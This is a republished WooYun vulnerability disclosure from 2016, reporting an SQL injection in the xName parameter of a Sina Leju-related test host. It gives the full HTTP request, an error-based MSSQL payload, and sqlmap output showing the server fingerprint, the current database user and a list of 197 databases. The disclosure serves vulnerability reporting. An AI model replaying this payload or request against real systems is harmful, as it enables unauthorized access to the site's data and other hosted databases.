新浪乐居某系统存在SQL注入漏洞

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-06-16: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

http://shleju.w114.mc-test.com/

详细说明:

参数:xName

code 区域
POST /xiangmulistview.aspx HTTP/1.1
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Referer: http://shleju.w114.mc-test.com:80/
Cookie: ASP.NET_SessionId=rslqpvnnhedmgmilulgj3d0z
Host: shleju.w114.mc-test.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

xName=1*

 

漏洞证明:

 

code 区域
sqlmap identified the following injection point(s) with a total of 208 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
current user: 'sq_yusuan'
current database: 'sq_yusuan'
current user is DBA: False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
available databases [197]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sq_1252724821
[*] sq_464475463
[*] sq_a0910205251
[*] sq_abc20131113
[*] sq_afanyi2013
[*] sq_agarwood
[*] sq_aixiu8023
[*] sq_almono
[*] sq_anadolu
[*] sq_angoltech
[*] sq_baiyuyin
[*] sq_bh2345l
[*] sq_bjsbfcsq
[*] sq_bocetest
[*] sq_cake88zs
[*] sq_camming
[*] sq_ceob521m
[*] sq_ceshisql
[*] sq_cf7191810
[*] sq_changshi82
[*] sq_chsichsi
[*] sq_ckts2014
[*] sq_cl2013
[*] sq_cnwoods
[*] sq_comsite
[*] sq_cqvitdb
[*] sq_czcwan123
[*] sq_danson
[*] sq_daohang0808
[*] sq_dbdg2011
[*] sq_dborder
[*] sq_ding2013
[*] sq_duduge1
[*] sq_duomeicc
[*] sq_dydongrui1
[*] sq_eastlowe
[*] sq_eastvendor
[*] sq_egrets2000
[*] sq_eimshouse
[*] sq_EMeal08
[*] sq_erpcqwjfccn
[*] sq_fanyi021net
[*] sq_feiyuxiu
[*] sq_fjjyyw2013
[*] sq_fjslsp
[*] sq_forid317
[*] sq_forwardtoys
[*] sq_freedomx
[*] sq_fxy0831
[*] sq_fzgrcycom
[*] sq_fzhou223mssql
[*] sq_gkbbt2
[*] sq_globalshare
[*] sq_gywdhg
[*] sq_gzdycom
[*] sq_gzjspxw123
[*] sq_gzxinhaosi2
[*] sq_h18918960336
[*] sq_hanwei123
[*] sq_hlsyh520
[*] sq_hmddream
[*] sq_hnpgxh
[*] sq_hnswms
[*] sq_hongstar365
[*] sq_huadingit
[*] sq_huiyoush
[*] sq_hunnintu
[*] sq_hxlr2013
[*] sq_hymz888
[*] sq_iuiyiuiy2
[*] sq_jbb365
[*] sq_jiayi161
[*] sq_jinbo6211
[*] sq_jinriyuqid
[*] sq_jinrong0808
[*] sq_jixingbang
[*] sq_jqsy1718
[*] sq_jsgwyksw
[*] sq_jtwdfw
[*] sq_junweisiqwe
[*] sq_juyu2015
[*] sq_jxg1124
[*] sq_kezhang0808
[*] sq_kuer1002
[*] sq_lantolink
[*] sq_lawer360
[*] sq_layer100
[*] sq_liuyinyu
[*] sq_liuyong7520
[*] sq_ljstrb
[*] sq_longhuyi
[*] sq_lsvcom
[*] sq_lvegunet
[*] sq_lzncic
[*] sq_mrmf0001
[*] sq_mrzdh2233
[*] sq_mswh3way
[*] sq_muchendiban
[*] sq_myintersys
[*] sq_mytestdb
[*] sq_mywslw
[*] sq_nbyaocai123
[*] sq_newswap
[*] sq_nf888888
[*] sq_NJDT2015
[*] sq_ntim20130930
[*] sq_pailew
[*] sq_pingou
[*] sq_pjkc
[*] sq_ptsgxq
[*] sq_pxid2013
[*] sq_qest2013
[*] sq_qiaoyf
[*] sq_qichao3000
[*] sq_qiuh9208
[*] sq_qq1012647
[*] sq_qq503037121
[*] sq_qqqnweb
[*] sq_rongyou2014
[*] sq_shanghu2013
[*] sq_shazhongq
[*] sq_shboyon2
[*] sq_shchezhixiao
[*] sq_shdashequ
[*] sq_shengzhaobio
[*] sq_shiyin520
[*] sq_shjmkq2000
[*] sq_shkj140813
[*] sq_shkj150425
[*] sq_shkj150721
[*] sq_shkj151016
[*] sq_shkj151026
[*] sq_shkj151217
[*] sq_shkj160503
[*] sq_shkj160509
[*] sq_shkj160525
[*] sq_shkj160603
[*] sq_shujuguanli
[*] sq_shujuku2013
[*] sq_shyunwen20131
[*] sq_sinee2016
[*] sq_siteserver
[*] sq_sitytech2013
[*] sq_sql2000date
[*] sq_sql2000wd
[*] sq_sqltopcourage
[*] sq_ssdd2013
[*] sq_stgdsyxx
[*] sq_sunpcdb1
[*] sq_sunshine2
[*] sq_talentcorpdb1
[*] sq_tbcxmb
[*] sq_tcby002
[*] sq_tcdq1974
[*] sq_testlaskdjf
[*] sq_tger258369
[*] sq_tingyou123
[*] sq_ufolbb2013
[*] sq_ujoygroup
[*] sq_w123456
[*] sq_wczx98
[*] sq_web8980
[*] sq_wem520
[*] sq_wesleydata
[*] sq_wlcyjd
[*] sq_wxpneumdata
[*] sq_wyxfl1
[*] sq_x2013l
[*] sq_xad20140530
[*] sq_xdpc111
[*] sq_xifashui
[*] sq_xiqing3
[*] sq_xnkq2013
[*] sq_yachuan
[*] sq_yanglan21v
[*] sq_yangyang
[*] sq_yanvps
[*] sq_yczedu
[*] sq_yfplastic001
[*] sq_yuanbxjz
[*] sq_yuetong
[*] sq_yusuan
[*] sq_yuyue
[*] sq_yzspfx
[*] sq_zenrebrand
[*] sq_zhangma
[*] sq_zhuanyi1
[*] sq_zjp03701
[*] sq_zjtonglicom
[*] sq_zslpms13
[*] sq_zukexbaicai
[*] tempdb





1.png



2.png



3.png



4.png

 

修复方案:

 

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-21 17:30

厂商回复:

 

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:新浪乐居某系统存在SQL注入漏洞 - https://www.15qq.cn/wooyun/163.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知